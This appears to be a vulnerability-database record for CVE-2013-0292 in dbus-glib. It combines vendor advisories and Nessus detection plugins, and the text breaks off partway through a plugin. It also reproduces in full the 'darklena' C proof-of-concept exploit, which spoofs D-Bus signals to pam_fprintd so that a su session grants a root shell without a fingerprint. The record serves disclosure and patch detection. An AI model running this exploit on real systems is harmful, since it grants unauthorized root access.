\r\n /* iterate over unique names short below under our own\r\n * to hit the previously started su\r\n */\r\n snprintf(dest, sizeof(dest), \":1.%d\", un - i);\r\n printf(\"[*] Using new destination: %s\\n\", dest);\r\n \r\n if (!dbus_message_set_destination(vrfy_msg, dest))\r\n die(\"[-] dbus_message_set_destination\");\r\n \r\n if (!dbus_message_set_destination(noc_msg, dest))\r\n die(\"[-] dbus_message_set_destination\");\r\n \r\n if (!dbus_connection_send(conn, noc_msg, &serial))\r\n die(\"[-] dbus_connection_send\");\r\n \r\n dbus_connection_flush(conn);\r\n usleep(1000);\r\n \r\n if (!dbus_connection_send(conn, vrfy_msg, &serial))\r\n die(\"[-] dbus_connection_send\");\r\n \r\n dbus_connection_flush(conn);\r\n \r\n dbus_message_unref(vrfy_msg);\r\n dbus_message_unref(noc_msg);\r\n }\r\n \r\n printf(\"\\n[**] Here comes the pain! (but no one's to too innocent to die)\\n\");\r\n return 0;\r\n}\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22315"}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0292"], "description": "[0.73-11]\r\n- Add patch to fix CVE-2013-0292\r\n- Resolves: #913072", "edition": 4, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-0568", "href": "http://linux.oracle.com/errata/ELSA-2013-0568.html", "title": "dbus-glib security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:28", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0292"], "description": "\nSebastian Krahmer reports:\n\nA privilege escalation flaw was found in the way dbus-glib, the\n\t D-Bus add-on library to integrate the standard D-Bus library with\n\t the GLib thread abstraction and main loop, performed filtering of\n\t the message sender (message source subject), when the\n\t NameOwnerChanged signal was received. A local attacker could use\n\t this flaw to escalate their privileges.\n\n", "edition": 4, "modified": "2014-04-30T00:00:00", "published": "2013-02-15T00:00:00", "id": "77BB0541-C1AA-11E3-A5AC-001B21614864", "href": "https://vuxml.freebsd.org/freebsd/77bb0541-c1aa-11e3-a5ac-001b21614864.html", "title": "dbus-glib -- privledge escalation", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-03T19:33:04", "description": "dbus-glib pam_fprintd - Local Root Exploit. CVE-2013-0292. Local exploit for linux platform", "published": "2014-06-02T00:00:00", "type": "exploitdb", "title": "dbus-glib pam_fprintd - Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0292"], "modified": "2014-06-02T00:00:00", "id": "EDB-ID:33614", "href": "https://www.exploit-db.com/exploits/33614/", "sourceData": "/* darklena. fprintd/pam_fprintd local root PoC. However dbus-glib plays an important role.\r\n *\r\n * (C) 2013 Sebastian Krahmer, all rights reversed.\r\n *\r\n * pam_fprintd uses net.reactivated.Fprint service to trigger finger swiping and\r\n * registers DBUS signal inside the PAM authentication function:\r\n *\r\n * dbus_g_proxy_add_signal(dev, \"VerifyStatus\", G_TYPE_STRING, G_TYPE_BOOLEAN, NULL);\r\n * dbus_g_proxy_add_signal(dev, \"VerifyFingerSelected\", G_TYPE_STRING, NULL);\r\n * dbus_g_proxy_connect_signal(dev, \"VerifyStatus\", G_CALLBACK(verify_result),\r\n * data, NULL);\r\n *\r\n * Then, when the DBUS signal arrives, the signal argument is basically just checked\r\n * to be the \"verify-match\" string; which however is expected to come from the legit\r\n * net.reactivated.Fprint service. Since there is no message filter registered in either\r\n * pam_fprintd, nor inside dbus-glib which it is using, such signals can be spoofed\r\n * by anyone. In order to do so, we first need to spoof a NameOwnerChanged signal\r\n * so the dbus_g_proxy_manager_filter() function inside dbus-glib will find our\r\n * sender-name (which cannot be spoofed) inside its hash tables and match it to\r\n * net.reactivated.Fprint.\r\n *\r\n * To test this PoC, start a service (su is fine) as user that is using pam_fprintd.\r\n * On a second xterm, when you see 'Swipe your ... finger' message start this PoC\r\n * and you will notice that a rootshell is spawned in the first xterm w/o giving your finger. :p\r\n *\r\n * Used various DBUS tutorials and example code, while writing this.\r\n *\r\n * $ cc darklena.c `pkg-config --cflags dbus-1` -ldbus-1 -Wall\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <dbus/dbus.h>\r\n\r\n\r\nvoid die(const char *s)\r\n{\r\n perror(s);\r\n exit(errno);\r\n}\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n DBusError err;\r\n DBusConnection *conn = NULL;\r\n DBusMessage *vrfy_msg = NULL, *noc_msg = NULL, *nl_msg = NULL, *reply = NULL;\r\n dbus_uint32_t serial = 0;\r\n dbus_bool_t t = 1;\r\n int un = 0, i = 0, reply_to = -1;\r\n const char *vrfy_match = \"verify-match\", *cname = NULL,\r\n *name = \"net.reactivated.Fprint\", *prev_owner = NULL;\r\n char dest[32];\r\n\r\n /* override unique name of net.reactivated.Fprint */\r\n if (argc > 1)\r\n prev_owner = strdup(argv[1]);\r\n\r\n printf(\"\\n[**] darklena, pam_fprintd PoC exploit 2013\\n\\n\");\r\n\r\n printf(\"[*] Initializing DBUS ...\\n\");\r\n dbus_error_init(&err);\r\n conn = dbus_bus_get(DBUS_BUS_SYSTEM, &err);\r\n\r\n if (dbus_error_is_set(&err)) {\r\n fprintf(stderr, \"Error: %s\\n\", err.message);\r\n die(\"dbus_error_is_set\");\r\n }\r\n\r\n if ((cname = dbus_bus_get_unique_name(conn)) == NULL)\r\n die(\"dbus_bus_get_unique_name\");\r\n\r\n un = atoi(strchr(cname, '.') + 1);\r\n\r\n printf(\"[+] Done. Found my unique name: %s (%d)\\n\", cname, un);\r\n\r\n if (!prev_owner) {\r\n printf(\"[*] Trying to find unique name of '%s' ...\\n\", name);\r\n nl_msg = dbus_message_new_method_call(\"org.freedesktop.DBus\",\r\n \"/org/freedesktop/DBus\",\r\n \"org.freedesktop.DBus\",\r\n \"GetNameOwner\");\r\n\r\n if (!dbus_message_append_args(nl_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_INVALID))\r\n die(\"[-] dbus_message_append_args\");\r\n\r\n reply = dbus_connection_send_with_reply_and_block(conn, nl_msg, reply_to, &err);\r\n dbus_message_unref(nl_msg);\r\n\r\n if (dbus_error_is_set(&err)) {\r\n fprintf (stderr, \"[-] Error: %s\\n\", err.message);\r\n die(\"[-] dbus_connection_send_with_reply_and_block\");\r\n }\r\n\r\n if (!dbus_message_get_args(reply, &err,\r\n DBUS_TYPE_STRING, &prev_owner, DBUS_TYPE_INVALID)) {\r\n fprintf(stderr, \"[-] Error: %s\\n\", err.message);\r\n die(\"[-] dbus_message_get_args\");\r\n }\r\n\r\n dbus_message_unref(reply);\r\n }\r\n\r\n printf(\"[+] Found unique name of '%s' as '%s'\\n\", name, prev_owner);\r\n\r\n for (i = 1; i < 20; ++i) {\r\n /* spoof a NameOwnerChanged signal */\r\n noc_msg = dbus_message_new_signal(\"/org/freedesktop/DBus\",\r\n \"org.freedesktop.DBus\",\r\n \"NameOwnerChanged\");\r\n\r\n /* spoof a VerifyStatus */\r\n vrfy_msg = dbus_message_new_signal(\"/net/reactivated/Fprint/Device/0\",\r\n \"net.reactivated.Fprint.Device\",\r\n \"VerifyStatus\");\r\n\r\n if (!vrfy_msg || !noc_msg)\r\n die(\"[-] dbus_message_new_signal\");\r\n\r\n if (!dbus_message_append_args(noc_msg, DBUS_TYPE_STRING, &name, DBUS_TYPE_STRING,\r\n &prev_owner, DBUS_TYPE_STRING, &cname, DBUS_TYPE_INVALID))\r\n die(\"[-] dbus_message_append_args1\");\r\n\r\n if (!dbus_message_append_args(vrfy_msg, DBUS_TYPE_STRING, &vrfy_match,\r\n DBUS_TYPE_BOOLEAN, &t, DBUS_TYPE_INVALID))\r\n die(\"[-] dbus_message_append_args2\");\r\n\r\n /* iterate over unique names short below under our own\r\n * to hit the previously started su\r\n */\r\n snprintf(dest, sizeof(dest), \":1.%d\", un - i);\r\n printf(\"[*] Using new destination: %s\\n\", dest);\r\n\r\n if (!dbus_message_set_destination(vrfy_msg, dest))\r\n die(\"[-] dbus_message_set_destination\");\r\n\r\n if (!dbus_message_set_destination(noc_msg, dest))\r\n die(\"[-] dbus_message_set_destination\");\r\n\r\n if (!dbus_connection_send(conn, noc_msg, &serial))\r\n die(\"[-] dbus_connection_send\");\r\n\r\n dbus_connection_flush(conn);\r\n usleep(1000);\r\n\r\n if (!dbus_connection_send(conn, vrfy_msg, &serial))\r\n die(\"[-] dbus_connection_send\");\r\n\r\n dbus_connection_flush(conn);\r\n\r\n dbus_message_unref(vrfy_msg);\r\n dbus_message_unref(noc_msg);\r\n }\r\n\r\n printf(\"\\n[**] Here comes the pain! (but no one's to too innocent to die)\\n\");\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33614/"}], "redhat": [{"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0292"], "description": "dbus-glib is an add-on library to integrate the standard D-Bus library with\nthe GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender (message\nsource subject) when the \"NameOwnerChanged\" signal was received. This\ncould trick a system service using dbus-glib (such as fprintd) into\nbelieving a signal was sent from a privileged process, when it was not. A\nlocal attacker could use this flaw to escalate their privileges.\n(CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nlinked against dbus-glib, such as fprintd and NetworkManager, must be\nrestarted for this update to take effect.\n", "modified": "2018-06-06T20:24:36", "published": "2013-02-26T05:00:00", "id": "RHSA-2013:0568", "href": "https://access.redhat.com/errata/RHSA-2013:0568", "type": "redhat", "title": "(RHSA-2013:0568) Important: dbus-glib security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:26", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4929", "CVE-2012-6075", "CVE-2013-0166", "CVE-2013-0169", "CVE-2013-0228", "CVE-2013-0268", "CVE-2013-0292", "CVE-2013-0338", "CVE-2013-0871", "CVE-2013-1619"], "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way QEMU-KVM emulated the e1000 network interface\ncard when the host was configured to accept jumbo network frames, and a\nguest using the e1000 emulated driver was not. A remote attacker could use\nthis flaw to crash the guest or, potentially, execute arbitrary code with\nroot privileges in the guest. (CVE-2012-6075)\n\nIt was discovered that GnuTLS leaked timing information when decrypting\nTLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A\nremote attacker could possibly use this flaw to retrieve plain text from\nthe encrypted packets by using a TLS/SSL server as a padding oracle.\n(CVE-2013-1619)\n\nIt was discovered that OpenSSL leaked timing information when decrypting\nTLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites\nwere used. A remote attacker could possibly use this flaw to retrieve plain\ntext from the encrypted packets by using a TLS/SSL or DTLS server as a\npadding oracle. (CVE-2013-0169)\n\nA NULL pointer dereference flaw was found in the OCSP response verification\nin OpenSSL. A malicious OCSP server could use this flaw to crash\napplications performing OCSP verification by sending a specially-crafted\nresponse. (CVE-2013-0166)\n\nIt was discovered that the TLS/SSL protocol could leak information about\nplain text when optional compression was used. An attacker able to control\npart of the plain text sent over an encrypted TLS/SSL connection could\npossibly use this flaw to recover other portions of the plain text.\n(CVE-2012-4929)\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2013-0292 (dbus-glib issue)\n\nCVE-2013-0228, CVE-2013-0268, and CVE-2013-0871 (kernel issues)\n\nCVE-2013-0338 (libxml2 issue)\n\nThis update contains the builds from the following errata:\n\novirt-node: RHBA-2013:0634\n https://rhn.redhat.com/errata/RHBA-2013-0634.html\nkernel: RHSA-2013:0630\n https://rhn.redhat.com/errata/RHSA-2013-0630.html\ndbus-glib: RHSA-2013:0568\n https://rhn.redhat.com/errata/RHSA-2013-0568.html\nlibcgroup: RHBA-2013:0560\n https://rhn.redhat.com/errata/RHBA-2013-0560.html\nvdsm: RHBA-2013:0635\n https://rhn.redhat.com/errata/RHBA-2013-0635.html\nselinux-policy: RHBA-2013:0618\n https://rhn.redhat.com/errata/RHBA-2013-0618.html\nqemu-kvm-rhev: RHSA-2013:0610\n https://rhn.redhat.com/errata/RHSA-2013-0610.html\nglusterfs: RHBA-2013:0620\n https://rhn.redhat.com/errata/RHBA-2013-0620.html\ngnutls: RHSA-2013:0588\n https://rhn.redhat.com/errata/RHSA-2013-0588.html\nipmitool: RHBA-2013:0572\n https://rhn.redhat.com/errata/RHBA-2013-0572.html\nlibxml2: RHSA-2013:0581\n https://rhn.redhat.com/errata/RHSA-2013-0581.html\nopenldap: RHBA-2013:0598\n https://rhn.redhat.com/errata/RHBA-2013-0598.html\nopenssl: RHSA-2013:0587\n https://rhn.redhat.com/errata/RHSA-2013-0587.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues.\n", "modified": "2018-06-07T08:59:36", "published": "2013-03-13T04:00:00", "id": "RHSA-2013:0636", "href": "https://access.redhat.com/errata/RHSA-2013:0636", "type": "redhat", "title": "(RHSA-2013:0636) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:36:35", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0292"], "description": "Sebastian Krahmer and Bastien Nocera discovered that DBus-GLib did not \nproperly validate the message sender when the \"NameOwnerChanged\" signal was \nreceived. A local attacker could possibly use this issue to escalate their \nprivileges.", "edition": 5, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "USN-1753-1", "href": "https://ubuntu.com/security/notices/USN-1753-1", "title": "DBus-GLib vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:45:55", "description": "Sebastian Krahmer reports :\n\nA privilege escalation flaw was found in the way dbus-glib, the D-Bus\nadd-on library to integrate the standard D-Bus library with the GLib\nthread abstraction and main loop, performed filtering of the message\nsender (message source subject), when the NameOwnerChanged signal was\nreceived. A local attacker could use this flaw to escalate their\nprivileges.", "edition": 21, "published": "2014-04-16T00:00:00", "title": "FreeBSD : dbus-glib -- privledge escalation (77bb0541-c1aa-11e3-a5ac-001b21614864)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2014-04-16T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:dbus-glib", "p-cpe:/a:freebsd:freebsd:linux-f10-dbus-glib"], "id": "FREEBSD_PKG_77BB0541C1AA11E3A5AC001B21614864.NASL", "href": "https://www.tenable.com/plugins/nessus/73550", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73550);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-0292\");\n\n script_name(english:\"FreeBSD : dbus-glib -- privledge escalation (77bb0541-c1aa-11e3-a5ac-001b21614864)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer reports :\n\nA privilege escalation flaw was found in the way dbus-glib, the D-Bus\nadd-on library to integrate the standard D-Bus library with the GLib\nthread abstraction and main loop, performed filtering of the message\nsender (message source subject), when the NameOwnerChanged signal was\nreceived. A local attacker could use this flaw to escalate their\nprivileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.freedesktop.org/show_bug.cgi?id=60916\"\n );\n # https://vuxml.freebsd.org/freebsd/77bb0541-c1aa-11e3-a5ac-001b21614864.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13ea6a19\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"dbus-glib<0.100.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-dbus-glib<0.100.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:54:05", "description": "Updated dbus-glib packages fix security vulnerability :\n\nA privilege escalation flaw was found in the way dbus-glib, the D-Bus\nadd-on library to integrate the standard D-Bus library with the GLib\nthread abstraction and main loop, performed filtering of the message\nsender (message source subject), when the NameOwnerChanged signal was\nreceived. A local attacker could use this flaw to escalate their\nprivileges (CVE-2013-0292).", "edition": 25, "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : dbus-glib (MDVSA-2013:071)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:lib64dbus-glib1_2", "p-cpe:/a:mandriva:linux:lib64dbus-glib"], "id": "MANDRIVA_MDVSA-2013-071.NASL", "href": "https://www.tenable.com/plugins/nessus/66085", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:071. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66085);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n script_xref(name:\"MDVSA\", value:\"2013:071\");\n script_xref(name:\"MGASA\", value:\"2013-0057\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dbus-glib (MDVSA-2013:071)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dbus-glib packages fix security vulnerability :\n\nA privilege escalation flaw was found in the way dbus-glib, the D-Bus\nadd-on library to integrate the standard D-Bus library with the GLib\nthread abstraction and main loop, performed filtering of the message\nsender (message source subject), when the NameOwnerChanged signal was\nreceived. A local attacker could use this flaw to escalate their\nprivileges (CVE-2013-0292).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected lib64dbus-glib and / or lib64dbus-glib1_2\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64dbus-glib1_2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64dbus-glib-0.96-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64dbus-glib1_2-0.96-2.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:53", "description": "This update fixes :\n\n - Bug #911714 - CVE-2013-0292 dbus-glib: Local privilege\n escalation due improper filtering of message sender when\n NameOwnerChanged signal received [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2013-07-14T00:00:00", "title": "Fedora 18 : dbus-glib-0.100-3.fc18 (2013-12156)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2013-07-14T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:dbus-glib"], "id": "FEDORA_2013-12156.NASL", "href": "https://www.tenable.com/plugins/nessus/68860", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-12156.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68860);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n script_xref(name:\"FEDORA\", value:\"2013-12156\");\n\n script_name(english:\"Fedora 18 : dbus-glib-0.100-3.fc18 (2013-12156)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes :\n\n - Bug #911714 - CVE-2013-0292 dbus-glib: Local privilege\n escalation due improper filtering of message sender when\n NameOwnerChanged signal received [fedora-all]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=911714\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/111404.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?761d2626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dbus-glib package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 